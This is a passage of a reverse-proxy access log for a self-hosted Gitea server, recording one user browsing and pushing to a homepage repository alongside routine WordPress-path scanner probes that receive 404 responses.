10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:01:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/8c1bb50f683d14c46b66c56f1782d3cd0b0949c6" [Client 222.117.41.51] [Length 23507] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:01:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:03:30:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9359] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.92.1.85] [Length 9346] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 45.92.1.85] [Length 13773] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9371] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9364] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:51 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9367] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9365] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.92.1.85] [Length 9366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Feb/2026:03:30:53 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 45.92.1.85] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[18/Feb/2026:04:35:42 +0000] - - 301 - GET http git.hanmocnn.co.kr "/wp-login.php" [Client 165.227.165.121] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:04:35:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wp-login.php" [Client 165.227.165.121] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0" "-" +[18/Feb/2026:08:31:18 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:08:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:08:31:18 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:14:28:13 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:14:28:13 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:14:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:14:28:20 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[18/Feb/2026:14:28:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11697] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:35 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:36 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92" [Client 222.117.41.51] [Length 50439] [Gzip 11.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/orginalSVG/CV.svg" [Client 222.117.41.51] [Length 7151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/path.png" [Client 222.117.41.51] [Length 101333] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/orginalSVG/XV.svg" [Client 222.117.41.51] [Length 6740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 40] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:14:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20356] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17524] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?only_content=true" [Client 222.117.41.51] [Length 7725] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html?sub_path=" [Client 222.117.41.51] [Length 11985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html?only_content=true" [Client 222.117.41.51] [Length 7685] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?only_content=true" [Client 222.117.41.51] [Length 4649] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?only_content=true" [Client 222.117.41.51] [Length 4958] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/npm?sub_path=" [Client 222.117.41.51] [Length 2531] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31459] [Gzip 11.26] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:14:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 79] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[18/Feb/2026:18:16:04 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 54.227.223.64] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[18/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 54.227.223.64] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 121.139.173.148] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 121.139.173.148] [Length 11696] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:01 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[18/Feb/2026:20:07:02 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 121.139.173.148] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 